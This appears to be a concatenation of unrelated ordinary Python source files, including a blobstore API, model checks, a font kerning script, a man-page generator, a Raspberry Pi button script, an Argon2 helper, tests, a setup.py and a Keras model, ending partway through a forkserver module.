"""A Python blobstore API used by app developers.
Contains methods uses to interface with Blobstore API. Defines db.Key-like
class representing a blob-key. Contains API part that forward to apiproxy.
"""
import datetime
import time
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import datastore
from google.appengine.api import datastore_errors
from google.appengine.api import datastore_types
from google.appengine.api import api_base_pb
from google.appengine.api.blobstore import blobstore_service_pb
from google.appengine.runtime import apiproxy_errors
__all__ = ['BLOB_INFO_KIND',
'BLOB_KEY_HEADER',
'BLOB_RANGE_HEADER',
'MAX_BLOB_FETCH_SIZE',
'UPLOAD_INFO_CREATION_HEADER',
'BlobFetchSizeTooLargeError',
'BlobKey',
'BlobNotFoundError',
'DataIndexOutOfRangeError',
'Error',
'InternalError',
'create_upload_url',
'delete',
'fetch_data',
]
BlobKey = datastore_types.BlobKey
BLOB_INFO_KIND = '__BlobInfo__'
BLOB_KEY_HEADER = 'X-AppEngine-BlobKey'
BLOB_RANGE_HEADER = 'X-AppEngine-BlobRange'
MAX_BLOB_FETCH_SIZE = (1 << 20) - (1 << 15)  # 1 MB minus 32 KB
UPLOAD_INFO_CREATION_HEADER = 'X-AppEngine-Upload-Creation'
_BASE_CREATION_HEADER_FORMAT = '%Y-%m-%d %H:%M:%S'
class Error(Exception):
"""Base blobstore error type."""
class InternalError(Error):
"""Raised when an internal error occurs within API."""
class BlobNotFoundError(Error):
"""Raised when attempting to access blob data for non-existant blob."""
class DataIndexOutOfRangeError(Error):
"""Raised when attempting to access indexes out of range in wrong order."""
class BlobFetchSizeTooLargeError(Error):
"""Raised when attempting to fetch too large a block from a blob."""
class _CreationFormatError(Error):
"""Raised when attempting to parse bad creation date format."""
def _ToBlobstoreError(error):
"""Translate an application error to a datastore Error, if possible.
Args:
error: An ApplicationError to translate.
"""
error_map = {
blobstore_service_pb.BlobstoreServiceError.INTERNAL_ERROR:
InternalError,
blobstore_service_pb.BlobstoreServiceError.BLOB_NOT_FOUND:
BlobNotFoundError,
blobstore_service_pb.BlobstoreServiceError.DATA_INDEX_OUT_OF_RANGE:
DataIndexOutOfRangeError,
blobstore_service_pb.BlobstoreServiceError.BLOB_FETCH_SIZE_TOO_LARGE:
BlobFetchSizeTooLargeError,
}
if error.application_error in error_map:
return error_map[error.application_error](error.error_detail)
else:
return error
def _format_creation(stamp):
"""Format an upload creation timestamp with milliseconds.
This method is necessary to format a timestamp with microseconds on Python
versions before 2.6.
Cannot simply convert datetime objects to str because the microseconds are
stripped from the format when set to 0. The upload creation date format will
always have microseconds padded out to 6 places.
Args:
stamp: datetime.datetime object to format.
Returns:
Formatted datetime as Python 2.6 format '%Y-%m-%d %H:%M:%S.%f'.
"""
return '%s.%06d' % (stamp.strftime(_BASE_CREATION_HEADER_FORMAT),
stamp.microsecond)
def _parse_creation(creation_string, field_name):
"""Parses upload creation string from header format.
Parse creation date of the format:
YYYY-mm-dd HH:MM:SS.ffffff
Y: Year
m: Month (01-12)
d: Day (01-31)
    H: Hour (00-23)
M: Minute (00-59)
S: Second (00-59)
f: Microsecond
Args:
creation_string: String creation date format.
Returns:
datetime object parsed from creation_string.
Raises:
_CreationFormatError when the creation string is formatted incorrectly.
"""
split_creation_string = creation_string.split('.', 1)
if len(split_creation_string) != 2:
raise _CreationFormatError(
'Could not parse creation %s in field %s.' % (creation_string,
field_name))
timestamp_string, microsecond = split_creation_string
try:
timestamp = time.strptime(timestamp_string,
_BASE_CREATION_HEADER_FORMAT)
microsecond = int(microsecond)
except ValueError:
raise _CreationFormatError('Could not parse creation %s in field %s.'
% (creation_string, field_name))
return datetime.datetime(*timestamp[:6] + tuple([microsecond]))
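# Illustrative round-trip (not part of the original module): formatting a
# datetime with _format_creation and parsing it back with _parse_creation
# preserves the microseconds:
#
#   stamp = datetime.datetime(2010, 5, 1, 12, 30, 59, 123456)
#   _format_creation(stamp)                # '2010-05-01 12:30:59.123456'
#   _parse_creation(_format_creation(stamp), 'example-field') == stamp  # True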
def create_upload_url(success_path,
_make_sync_call=apiproxy_stub_map.MakeSyncCall):
"""Create upload URL for POST form.
Args:
success_path: Path within application to call when POST is successful
and upload is complete.
_make_sync_call: Used for dependency injection in tests.
"""
request = blobstore_service_pb.CreateUploadURLRequest()
response = blobstore_service_pb.CreateUploadURLResponse()
request.set_success_path(success_path)
try:
_make_sync_call('blobstore', 'CreateUploadURL', request, response)
except apiproxy_errors.ApplicationError, e:
raise _ToBlobstoreError(e)
return response.url()
def delete(blob_keys, _make_sync_call=apiproxy_stub_map.MakeSyncCall):
"""Delete a blob from Blobstore.
Args:
blob_keys: Single instance or list of blob keys. A blob-key can be either
a string or an instance of BlobKey.
_make_sync_call: Used for dependency injection in tests.
"""
if isinstance(blob_keys, (basestring, BlobKey)):
blob_keys = [blob_keys]
request = blobstore_service_pb.DeleteBlobRequest()
for blob_key in blob_keys:
request.add_blob_key(str(blob_key))
response = api_base_pb.VoidProto()
try:
_make_sync_call('blobstore', 'DeleteBlob', request, response)
except apiproxy_errors.ApplicationError, e:
raise _ToBlobstoreError(e)
def fetch_data(blob_key, start_index, end_index,
_make_sync_call=apiproxy_stub_map.MakeSyncCall):
"""Fetch data for blob.
See docstring for ext.blobstore.fetch_data for more details.
Args:
    blob_key: BlobKey, str or unicode representation of BlobKey of
      blob to fetch data from.
    start_index: Start index of blob data to fetch. May not be negative.
    end_index: End index (inclusive) of blob data to fetch. Must be
>= start_index.
Returns:
str containing partial data of blob. See docstring for
ext.blobstore.fetch_data for more details.
Raises:
See docstring for ext.blobstore.fetch_data for more details.
"""
if not isinstance(start_index, (int, long)):
raise TypeError('start_index must be integer.')
if not isinstance(end_index, (int, long)):
raise TypeError('end_index must be integer.')
if isinstance(blob_key, BlobKey):
blob_key = str(blob_key).decode('utf-8')
elif isinstance(blob_key, str):
blob_key = blob_key.decode('utf-8')
elif not isinstance(blob_key, unicode):
raise TypeError('Blob-key must be str, unicode or BlobKey: %s' % blob_key)
if start_index < 0:
raise DataIndexOutOfRangeError(
'May not fetch blob at negative index.')
if end_index < start_index:
raise DataIndexOutOfRangeError(
'Start index %d > end index %d' % (start_index, end_index))
fetch_size = end_index - start_index + 1
if fetch_size > MAX_BLOB_FETCH_SIZE:
raise BlobFetchSizeTooLargeError(
'Blob fetch size is too large: %d' % fetch_size)
request = blobstore_service_pb.FetchDataRequest()
response = blobstore_service_pb.FetchDataResponse()
request.set_blob_key(blob_key)
request.set_start_index(start_index)
request.set_end_index(end_index)
try:
_make_sync_call('blobstore', 'FetchData', request, response)
except apiproxy_errors.ApplicationError, e:
raise _ToBlobstoreError(e)
return response.data()
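# Illustrative usage (not part of the original module): both indexes are
# inclusive, so the first ten bytes of a blob are indexes 0..9. Here
# my_blob_key stands for some existing BlobKey:
#
#   data = fetch_data(my_blob_key, 0, 9)
#   assert len(data) <= 10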
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from math import isinf, isnan
from warnings import warn
NOT_MASS_BALANCED_TERMS = {"SBO:0000627", # EXCHANGE
"SBO:0000628", # DEMAND
"SBO:0000629", # BIOMASS
"SBO:0000631", # PSEUDOREACTION
"SBO:0000632", # SINK
}
def check_mass_balance(model):
    """Return {reaction: element imbalances} for reactions that are not mass balanced."""
    unbalanced = {}
for reaction in model.reactions:
if reaction.annotation.get("SBO") not in NOT_MASS_BALANCED_TERMS:
balance = reaction.check_mass_balance()
if balance:
unbalanced[reaction] = balance
return unbalanced
# no longer strictly necessary, done by optlang solver interfaces
def check_reaction_bounds(model):
warn("no longer necessary, done by optlang solver interfaces",
DeprecationWarning)
errors = []
for reaction in model.reactions:
if reaction.lower_bound > reaction.upper_bound:
errors.append("Reaction '%s' has lower bound > upper bound" %
reaction.id)
if isinf(reaction.lower_bound):
errors.append("Reaction '%s' has infinite lower_bound" %
reaction.id)
elif isnan(reaction.lower_bound):
errors.append("Reaction '%s' has NaN for lower_bound" %
reaction.id)
if isinf(reaction.upper_bound):
errors.append("Reaction '%s' has infinite upper_bound" %
reaction.id)
elif isnan(reaction.upper_bound):
errors.append("Reaction '%s' has NaN for upper_bound" %
reaction.id)
return errors
def check_metabolite_compartment_formula(model):
errors = []
for met in model.metabolites:
if met.formula is not None and len(met.formula) > 0:
if not met.formula.isalnum():
errors.append("Metabolite '%s' formula '%s' not alphanumeric" %
(met.id, met.formula))
return errors
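# Minimal usage sketch (not part of the original module), assuming `model` is
# a cobra model loaded elsewhere, e.g. with cobra.io.read_sbml_model:
#
#   unbalanced = check_mass_balance(model)
#   for reaction, imbalance in unbalanced.items():
#       print("%s is unbalanced: %s" % (reaction.id, imbalance))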
#MenuTitle: Remove Kerning Pairs for Selected Glyphs
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Deletes all kerning pairs with the selected glyphs, for the current master only.
"""
Font = Glyphs.font
Master = Font.selectedFontMaster
selectedLayers = Font.selectedLayers
listOfIDs = [ x.parent.id for x in selectedLayers ]
masterID = Master.id
totalNumberOfDeletions = 0
print("Analyzing kerning pairs in %s ..." % Master.name)
print("1. Pairs where selected glyphs are on the left side:")
pairsToBeDeleted = []
for leftGlyphID in listOfIDs:
leftGlyphName = Font.glyphForId_( leftGlyphID ).name
try:
# print leftGlyphID, leftGlyphName, len( Font.kerning[ masterID ][ leftGlyphID ] ) #DEBUG
if leftGlyphID in Font.kerning[ masterID ]:
rightGlyphIDs = Font.kerning[ masterID ][ leftGlyphID ].keys()
numberOfPairs = len( rightGlyphIDs )
rightGlyphNames = [ Font.glyphForId_(x).name for x in rightGlyphIDs ]
totalNumberOfDeletions += numberOfPairs
print(" %s on the left: Found %i pairs ..." % ( leftGlyphName, numberOfPairs ))
#print " ".join( rightGlyphNames ) #DEBUG
pairsToBeDeleted.append( [leftGlyphName, rightGlyphNames] )
except Exception as e:
print("-- Error while processing %s (%s)" % ( leftGlyphName, e ))
print("2. Deleting these %i pairs ..." % ( totalNumberOfDeletions ))
for thisDeletionGroup in pairsToBeDeleted:
leftGlyphName = thisDeletionGroup[0]
rightGlyphNames = thisDeletionGroup[1]
for thisRightGlyphName in rightGlyphNames:
try:
Font.removeKerningForPair( masterID, leftGlyphName, thisRightGlyphName )
except Exception as e:
print("-- Error: could not delete pair %s %s (%s)" % ( leftGlyphName, thisRightGlyphName, e ))
print("3. Pairs where selected glyphs are on the right side (may take a while):")
pairsToBeDeleted = []
for leftGlyphID in Font.kerning[ masterID ].keys():
for rightGlyphID in Font.kerning[ masterID ][ leftGlyphID ].keys():
if rightGlyphID in listOfIDs:
pairsToBeDeleted.append( [ leftGlyphID, rightGlyphID ] )
print("4. Deleting these pairs ...")
for kernPair in pairsToBeDeleted:
rightGlyphName = Font.glyphForId_( kernPair[1] ).name
if kernPair[0][0] == "@":
# left glyph is a class
leftGlyphName = kernPair[0]
else:
# left glyph is a glyph
leftGlyphName = Font.glyphForId_( kernPair[0] ).name
# print " Deleting pair: %s %s ..." % ( leftGlyphName, rightGlyphName )
try:
Font.removeKerningForPair( masterID, leftGlyphName, rightGlyphName )
except Exception as e:
print("-- Error: could not delete pair %s %s (%s)" % ( leftGlyphName, rightGlyphName, e ))
totalNumberOfDeletions += ( len( pairsToBeDeleted ) )
print("Done: %i pairs deleted in %s." % ( totalNumberOfDeletions, Master.name ))
# coding: utf-8
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import argparse
import os.path
import pathlib
import sys
from jinja2 import Environment, FileSystemLoader
from ansible.module_utils._text import to_bytes
# Pylint doesn't understand Python3 namespace modules.
from ..change_detection import update_file_if_different # pylint: disable=relative-beyond-top-level
from ..commands import Command # pylint: disable=relative-beyond-top-level
DEFAULT_TEMPLATE_FILE = pathlib.Path(__file__).parents[4] / 'docs/templates/man.j2'
# from https://www.python.org/dev/peps/pep-0257/
def trim_docstring(docstring):
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join(trimmed)
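# Illustrative behaviour (not part of the original module): trim_docstring
# removes the common indentation and the blank edge lines, e.g.
#
#   trim_docstring("first\n    second\n\n")   # -> 'first\nsecond'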
def get_options(optlist):
''' get actual options '''
opts = []
for opt in optlist:
res = {
'desc': opt.help,
'options': opt.option_strings
}
if isinstance(opt, argparse._StoreAction):
res['arg'] = opt.dest.upper()
elif not res['options']:
continue
opts.append(res)
return opts
def dedupe_groups(parser):
action_groups = []
for action_group in parser._action_groups:
found = False
for a in action_groups:
if a._actions == action_group._actions:
found = True
break
if not found:
action_groups.append(action_group)
return action_groups
def get_option_groups(option_parser):
groups = []
for action_group in dedupe_groups(option_parser)[1:]:
group_info = {}
group_info['desc'] = action_group.description
group_info['options'] = action_group._actions
group_info['group_obj'] = action_group
groups.append(group_info)
return groups
def opt_doc_list(parser):
''' iterate over options lists '''
results = []
for option_group in dedupe_groups(parser)[1:]:
results.extend(get_options(option_group._actions))
results.extend(get_options(parser._actions))
return results
# def opts_docs(cli, name):
def opts_docs(cli_class_name, cli_module_name):
''' generate doc structure from options '''
cli_name = 'ansible-%s' % cli_module_name
if cli_module_name == 'adhoc':
cli_name = 'ansible'
    # With no action/subcommand
# shared opts set
# instantiate each cli and ask its options
cli_klass = getattr(__import__("ansible.cli.%s" % cli_module_name,
fromlist=[cli_class_name]), cli_class_name)
cli = cli_klass([cli_name])
# parse the common options
try:
cli.init_parser()
except Exception:
pass
# base/common cli info
docs = {
'cli': cli_module_name,
'cli_name': cli_name,
'usage': cli.parser.format_usage(),
'short_desc': cli.parser.description,
'long_desc': trim_docstring(cli.__doc__),
'actions': {},
'content_depth': 2,
}
option_info = {'option_names': [],
'options': [],
'groups': []}
    for extras in ('ARGUMENTS',):  # note the comma: a bare string would iterate per character
if hasattr(cli, extras):
docs[extras.lower()] = getattr(cli, extras)
common_opts = opt_doc_list(cli.parser)
groups_info = get_option_groups(cli.parser)
shared_opt_names = []
for opt in common_opts:
shared_opt_names.extend(opt.get('options', []))
option_info['options'] = common_opts
option_info['option_names'] = shared_opt_names
option_info['groups'].extend(groups_info)
docs.update(option_info)
# now for each action/subcommand
# force populate parser with per action options
def get_actions(parser, docs):
        # use class attrs not the attrs on an instance (not that it matters here...)
try:
subparser = parser._subparsers._group_actions[0].choices
except AttributeError:
subparser = {}
depth = 0
for action, parser in subparser.items():
action_info = {'option_names': [],
'options': [],
'actions': {}}
# docs['actions'][action] = {}
# docs['actions'][action]['name'] = action
action_info['name'] = action
action_info['desc'] = trim_docstring(getattr(cli, 'execute_%s' % action).__doc__)
# docs['actions'][action]['desc'] = getattr(cli, 'execute_%s' % action).__doc__.strip()
action_doc_list = opt_doc_list(parser)
uncommon_options = []
for action_doc in action_doc_list:
# uncommon_options = []
option_aliases = action_doc.get('options', [])
for option_alias in option_aliases:
if option_alias in shared_opt_names:
continue
# TODO: use set
if option_alias not in action_info['option_names']:
action_info['option_names'].append(option_alias)
if action_doc in action_info['options']:
continue
uncommon_options.append(action_doc)
action_info['options'] = uncommon_options
depth = 1 + get_actions(parser, action_info)
docs['actions'][action] = action_info
return depth
action_depth = get_actions(cli.parser, docs)
docs['content_depth'] = action_depth + 1
docs['options'] = opt_doc_list(cli.parser)
return docs
class GenerateMan(Command):
name = 'generate-man'
@classmethod
def init_parser(cls, add_parser):
parser = add_parser(name=cls.name,
description='Generate cli documentation from cli docstrings')
parser.add_argument("-t", "--template-file", action="store", dest="template_file",
default=DEFAULT_TEMPLATE_FILE, help="path to jinja2 template")
parser.add_argument("-o", "--output-dir", action="store", dest="output_dir",
default='/tmp/', help="Output directory for rst files")
parser.add_argument("-f", "--output-format", action="store", dest="output_format",
default='man',
help="Output format for docs (the default 'man' or 'rst')")
parser.add_argument('cli_modules', help='CLI module name(s)', metavar='MODULE_NAME', nargs='*')
@staticmethod
def main(args):
template_file = args.template_file
template_path = os.path.expanduser(template_file)
template_dir = os.path.abspath(os.path.dirname(template_path))
template_basename = os.path.basename(template_file)
output_dir = os.path.abspath(args.output_dir)
output_format = args.output_format
cli_modules = args.cli_modules
        # various cli parsing code checks sys.argv when the 'args' passed in are [],
        # so strip sys.argv down so the cli modules don't try to parse it and emit warnings
sys.argv = [sys.argv[0]]
allvars = {}
output = {}
cli_list = []
cli_bin_name_list = []
# for binary in os.listdir('../../lib/ansible/cli'):
for cli_module_name in cli_modules:
binary = os.path.basename(os.path.expanduser(cli_module_name))
if not binary.endswith('.py'):
continue
elif binary == '__init__.py':
continue
cli_name = os.path.splitext(binary)[0]
if cli_name == 'adhoc':
cli_class_name = 'AdHocCLI'
# myclass = 'AdHocCLI'
output[cli_name] = 'ansible.1.rst.in'
cli_bin_name = 'ansible'
else:
# myclass = "%sCLI" % libname.capitalize()
cli_class_name = "%sCLI" % cli_name.capitalize()
output[cli_name] = 'ansible-%s.1.rst.in' % cli_name
cli_bin_name = 'ansible-%s' % cli_name
# FIXME:
allvars[cli_name] = opts_docs(cli_class_name, cli_name)
cli_bin_name_list.append(cli_bin_name)
cli_list = allvars.keys()
doc_name_formats = {'man': '%s.1.rst.in',
'rst': '%s.rst'}
for cli_name in cli_list:
# template it!
env = Environment(loader=FileSystemLoader(template_dir))
template = env.get_template(template_basename)
# add rest to vars
tvars = allvars[cli_name]
tvars['cli_list'] = cli_list
tvars['cli_bin_name_list'] = cli_bin_name_list
tvars['cli'] = cli_name
            # each option entry is a dict; check '-i' against its option strings
            if any('-i' in opt.get('options', []) for opt in tvars['options']):
                print('uses inventory')
manpage = template.render(tvars)
filename = os.path.join(output_dir, doc_name_formats[output_format] % tvars['cli_name'])
update_file_if_different(filename, to_bytes(manpage))
#!/usr/bin/python
#the shebang line above tells the system to run this script with Python
import pibrella
import time
import subprocess
presstime = 0.
def button_changed(pin):
global presstime
if pin.read() == 1:
presstime = time.time()
#print(presstime)
pibrella.light.green.on()
else:
releasetime = time.time()
timedifference = releasetime - presstime #how long the button was pressed
if timedifference < 3.:
            pibrella.light.green.off() #turn the green light back off before starting
print("start pin sequence")
#start pin sequence
subprocess.call(["/home/pi/startall.sh"])
else:
pibrella.light.yellow.off() #light turns off when shutdown happens
print("Shutdown!")
#do the shutdown
#subprocess.call(["echo", "shutdown -h now"])
subprocess.call(["/usr/bin/shutdown", "-h", "now"])
def lighttransition():
global presstime
    time.sleep(.1) #wait briefly between polls
if pibrella.button.read() == 1 or pibrella.input.a.read() == 1:
#above line checks both of the buttons for changes
time.sleep(.1)
currenttime = time.time()
timedifference = currenttime - presstime
#print(timedifference, currenttime, presstime)
        if timedifference > 3.: #after 3 seconds switch the lights to signal a long press
pibrella.light.green.off()
pibrella.light.yellow.on()
#turns red led on to show that the program is running
pibrella.light.red.on()
pibrella.button.changed(button_changed) #register the handler for the onboard button
pibrella.input.a.changed(button_changed) #and for the wired button on input A
pibrella.loop(lighttransition)
pibrella.pause()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Cryptoshop Strong file encryption.
# Encrypt and decrypt file in GCM mode with AES, Serpent or Twofish as secure as possible.
# Copyright(C) 2016 CORRAIRE Fabrice. [email protected]
# ############################################################################
# This file is part of Cryptoshop-GUI (full Qt5 gui for Cryptoshop).
#
# Cryptoshop is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Cryptoshop is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cryptoshop. If not, see <http://www.gnu.org/licenses/>.
# ############################################################################
import argon2
from ._settings import __argon2_memory_cost__, __argon2_parallelism__, __argon2_timing_cost__
def calc_derivation(passphrase, salt):
"""
    Calculate a 32-byte key derivation with Argon2.
    :param passphrase: A string of any length specified by user.
    :param salt: 512 bits generated by Botan Random Number Generator.
    :return: a 32-byte raw key.
"""
argonhash = argon2.low_level.hash_secret_raw((str.encode(passphrase)), salt=salt, hash_len=32,
time_cost=__argon2_timing_cost__, memory_cost=__argon2_memory_cost__,
parallelism=__argon2_parallelism__, type=argon2.low_level.Type.I)
return argonhash
def calc_derivation_formated(passphrase, salt):
"""
    Calculate a 32-byte key derivation with Argon2, in encoded form.
    :param passphrase: A string of any length specified by user.
    :param salt: 512 bits generated by Botan Random Number Generator.
    :return: an Argon2-encoded hash string rather than the raw bytes.
"""
argonhash = argon2.low_level.hash_secret((str.encode(passphrase)), salt=salt, hash_len=32,
time_cost=__argon2_timing_cost__, memory_cost=__argon2_memory_cost__,
parallelism=__argon2_parallelism__, type=argon2.low_level.Type.I)
return argonhash
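# Minimal usage sketch (not part of the original module). Cryptoshop generates
# the salt with Botan's RNG; os.urandom stands in here purely for illustration:
#
#   import os
#   salt = os.urandom(64)                        # 512-bit salt
#   key = calc_derivation("my passphrase", salt)
#   assert len(key) == 32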
import sys
import traceback
import threading
from gi.repository import GLib
from lutris.util.log import logger
class AsyncCall(threading.Thread):
def __init__(self, function, callback=None, *args, **kwargs):
"""Execute `function` in a new thread then schedule `callback` for
execution in the main loop.
"""
self.stop_request = threading.Event()
super(AsyncCall, self).__init__(target=self.target, args=args,
kwargs=kwargs)
self.function = function
self.callback = callback if callback else lambda r, e: None
        # pop 'daemon' before start(): Thread keeps a reference to this same
        # kwargs dict, so the target function never receives it
        self.daemon = kwargs.pop('daemon', True)
self.start()
def target(self, *args, **kwargs):
result = None
error = None
try:
result = self.function(*args, **kwargs)
except Exception as err:
logger.error("Error while completing task %s: %s",
self.function, err)
error = err
ex_type, ex_value, tb = sys.exc_info()
print(ex_type, ex_value)
traceback.print_tb(tb)
GLib.idle_add(lambda: self.callback(result, error))
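# Minimal usage sketch (not part of the original module): run a slow function
# off the main thread and handle its result back in the GLib main loop. The
# names fetch/on_done/url are placeholders:
#
#   def fetch(url):
#       ...  # long-running work
#
#   def on_done(result, error):
#       if error:
#           logger.error("fetch failed: %s", error)
#
#   AsyncCall(fetch, on_done, "https://example.com")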
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
class TestAdamaxAPI(unittest.TestCase):
def test_adamax_api_dygraph(self):
paddle.disable_static()
value = np.arange(26).reshape(2, 13).astype("float32")
a = paddle.to_tensor(value)
linear = paddle.nn.Linear(13, 5)
adam = paddle.optimizer.Adamax(
learning_rate=0.01,
parameters=linear.parameters(),
weight_decay=0.01)
out = linear(a)
out.backward()
adam.step()
adam.clear_gradients()
def test_adamax_api(self):
place = fluid.CPUPlace()
shape = [2, 3, 8, 8]
exe = fluid.Executor(place)
train_prog = fluid.Program()
startup = fluid.Program()
with fluid.program_guard(train_prog, startup):
with fluid.unique_name.guard():
data = fluid.data(name="data", shape=shape)
conv = fluid.layers.conv2d(data, 8, 3)
loss = paddle.mean(conv)
beta1 = 0.85
beta2 = 0.95
opt = paddle.optimizer.Adamax(
learning_rate=1e-5,
beta1=beta1,
beta2=beta2,
weight_decay=0.01,
epsilon=1e-8)
opt.minimize(loss)
exe.run(startup)
data_np = np.random.random(shape).astype('float32')
rets = exe.run(train_prog, feed={"data": data_np}, fetch_list=[loss])
assert rets[0] is not None
if __name__ == "__main__":
unittest.main()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from setuptools import setup
import re
import os
import sys
name = 'mkdocs'
package = 'mkdocs'
description = 'Project documentation with Markdown.'
url = 'http://www.mkdocs.org'
author = 'Tom Christie'
author_email = '[email protected]'
license = 'BSD'
install_requires = [
'Jinja2>=2.7.1',
'Markdown>=2.3.1,<2.5',
'PyYAML>=3.10',
'watchdog>=0.7.0',
'ghp-import>=0.4.1'
]
long_description = (
"MkDocs is a fast, simple and downright gorgeous static site generator "
"that's geared towards building project documentation. Documentation "
"source files are written in Markdown, and configured with a single YAML "
"configuration file."
)
def get_version(package):
"""
    Return package version as listed in `__version__` in `__init__.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]", init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
args = {'version': get_version(package)}
print("You probably want to also tag the version now:")
print(" git tag -a %(version)s -m 'version %(version)s'" % args)
print(" git push --tags")
sys.exit()
setup(
name=name,
version=get_version(package),
url=url,
license=license,
description=description,
long_description=long_description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=install_requires,
entry_points={
'console_scripts': [
'mkdocs = mkdocs.main:run_main',
],
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Documentation',
'Topic :: Text Processing',
]
)
import sys
sys.path.insert(0, "/input/") #for
sys.path.insert(0, "../common/") #for local
import common
from keras.models import Sequential
from keras.layers import *
model = Sequential()
model.add(SeparableConv2D(8, (7, 7), padding='same',
input_shape=(common.resolution_x, common.resolution_y, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(4, 4)))
model.add(SeparableConv2D(8, (5, 5), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(SeparableConv2D(8, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(BatchNormalization())
model.add(SeparableConv2D(8, (1, 1), padding='same'))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(GlobalAveragePooling2D())
model.add(Dropout(0.5))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(2))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
common.experiment(model)
import errno
import os
import selectors
import signal
import socket
import struct
import sys
import threading
import warnings
from . import connection
from . import process
from .context import reduction
from . import semaphore_tracker
from . import spawn
from . import util
__all__ = ['ensure_running', 'get_inherited_fds', 'connect_to_new_process',
'set_forkserver_preload']
#
#
#
MAXFDS_TO_SEND = 256
SIGNED_STRUCT = struct.Struct('q') # large enough for pid_t
#
# Forkserver class
#
class ForkServer(object):
def __init__(self):
self._forkserver_address = None
self._forkserver_alive_fd = None
self._forkserver_pid = None
self._inherited_fds = None
self._lock = threading.Lock()
self._preload_modules = ['__main__']
def set_forkserver_preload(self, modules_names):
'''Set list of module names to try to load in forkserver process.'''
        # validate the argument being assigned, not the previously stored list
        if not all(type(mod) is str for mod in modules_names):
raise TypeError('module_names must be a list of strings')
self._preload_modules = modules_names
def get_inherited_fds(self):
'''Return list of fds inherited from parent process.
This returns None if the current process was not started by fork
server.
'''
return self._inherited_fds
def connect_to_new_process(self, fds):
'''Request forkserver to create a child process.
Returns a pair of fds (status_r, data_w). The calling process can read
the child process's pid and (eventually) its returncode from status_r.
The calling process should write to data_w the pickled preparation and
process data.
'''
self.ensure_running()
if len(fds) + 4 >= MAXFDS_TO_SEND:
raise ValueError('too many fds')
with socket.socket(socket.AF_UNIX) as client:
client.connect(self._forkserver_address)
parent_r, child_w = os.pipe()
child_r, parent_w = os.pipe()
allfds = [child_r, child_w, self._forkserver_alive_fd,
semaphore_tracker.getfd()]
allfds += fds
try:
reduction.sendfds(client, allfds)
return parent_r, parent_w
except:
os.close(parent_r)
os.close(parent_w)
raise
finally:
os.close(child_r)
os.close(child_w)
def ensure_running(self):
'''Make sure that a fork server is running.
This can be called from any process. Note that usually a child
